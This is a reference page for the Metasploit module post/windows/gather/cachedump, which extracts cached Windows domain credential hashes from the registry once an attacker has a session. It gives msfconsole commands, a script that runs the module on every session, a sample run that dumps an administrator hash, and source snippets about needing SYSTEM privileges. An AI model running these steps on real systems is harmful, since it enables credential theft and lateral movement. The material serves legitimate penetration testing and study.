Windows Gather Credential Cache Dump - Metasploit


This page contains detailed information about how to use the post/windows/gather/cachedump metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather Credential Cache Dump
Module: post/windows/gather/cachedump
Source code: modules/post/windows/gather/cachedump.rb
Disclosure date: -
Last modification time: 2021-10-06 13:43:31 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/cachedump

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/cachedump
msf post(cachedump) > show options
    ... show and set options ...
msf post(cachedump) > set SESSION session-id
msf post(cachedump) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/cachedump")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.

Verification Steps


  1. Start msfconsole
  2. Get meterpreter session
  3. Do: use post/windows/gather/cachedump
  4. Do: set SESSION <session id>
  5. Do: run

Options


SESSION

The session to run this module on.

Scenarios


Windows 7 (6.1 Build 7601, Service Pack 1).

  [*] Meterpreter session 1 opened (192.168.1.3:4444 -> 192.168.1.6:49184) at 2019-12-11 12:51:59 -0700

  msf > use post/windows/gather/cachedump
  msf post(windows/gather/cachedump) > set SESSION 1
    SESSION => 1
  msf post(windows/gather/cachedump) > run

    [*] Executing module against TEST-PC
    [*] Cached Credentials Setting: 10 - (Max is 50 and 0 disables, and 10 is default)
    [*] Obtaining boot key...
    [*] Obtaining Lsa key...
    [*] Vista or above system
    [*] Obtaining NL$KM...
    [*] Dumping cached credentials...
    [*] Hash are in MSCACHE_VISTA format. (mscash2)
    [+] MSCACHE v2 saved in: /root/.msf4/loot/20191211134214_default_192.168.1.6_mscache2.creds_626325.txt
    [*] John the Ripper format:
    # mscash2
    administrator:$DCC2$10240#administrator#89f253291a4b53a41c94057d644cbd1d::

    [*] Post module execution completed

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/cachedump post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/cachedump

msf6 post(windows/gather/cachedump) > show info

       Name: Windows Gather Credential Cache Dump
     Module: post/windows/gather/cachedump
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  Maurizio Agazzini <[email protected]>
  mubix <[email protected]>

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module uses the registry to extract the stored domain hashes 
  that have been cached as a result of a GPO setting. The default 
  setting on Windows is to store the last ten successful logins.

References:
  http://lab.mediaservice.net/code/cachedump.rb

Module Options


This is a complete list of options available in the windows/gather/cachedump post exploitation module:

msf6 post(windows/gather/cachedump) > show options

Module options (post/windows/gather/cachedump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/cachedump post exploitation module:

msf6 post(windows/gather/cachedump) > show advanced

Module advanced options (post/windows/gather/cachedump):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/cachedump module can do:

msf6 post(windows/gather/cachedump) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/cachedump post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/cachedump) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

System is not joined to a domain, exiting..


Here is a relevant code snippet related to the "System is not joined to a domain, exiting.." error message:

309:	      if sysinfo['Architecture'] == ARCH_X64
310:	        join_status = join_status & 0x00000000ffffffff
311:	      end
312:	
313:	      if join_status != 3
314:	        print_error("System is not joined to a domain, exiting..")
315:	        return
316:	      end
317:	
318:	      # Check policy setting for cached creds
319:	      check_gpo

Could not retrieve LSA key. Are you SYSTEM?


Here is a relevant code snippet related to the "Could not retrieve LSA key. Are you SYSTEM?" error message:

323:	      vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
324:	
325:	      print_status('Obtaining Lsa key...')
326:	      lsakey = capture_lsa_key(bootkey)
327:	      if lsakey.nil?
328:	        print_error("Could not retrieve LSA key. Are you SYSTEM?")
329:	        return
330:	      end
331:	
332:	      vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
333:	

Meterpreter Exception: <E.CLASS> <E>


Here is a relevant code snippet related to the "Meterpreter Exception: <E.CLASS> <E>" error message:

386:	
387:	      print_status("John the Ripper format:")
388:	      print_line john
389:	    rescue ::Interrupt
390:	      raise $!
391:	    rescue ::Rex::Post::Meterpreter::RequestError => e
392:	      print_error("Meterpreter Exception: #{e.class} #{e}")
393:	      print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
394:	    end
395:	  end
396:	end

This script requires the use of a SYSTEM user context (hint: migrate into service process)


Here is a relevant code snippet related to the "This script requires the use of a SYSTEM user context (hint: migrate into service process)" error message:

386:	
387:	      print_status("John the Ripper format:")
388:	      print_line john
389:	    rescue ::Interrupt
390:	      raise $!
391:	    rescue ::Rex::Post::Meterpreter::RequestError => e
392:	      print_error("Meterpreter Exception: #{e.class} #{e}")
393:	      print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
394:	    end
395:	  end
396:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • Maurizio Agazzini <inode[at]mediaservice.net>
  • mubix

Version


This page has been produced using Metasploit Framework version 6.2.1-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.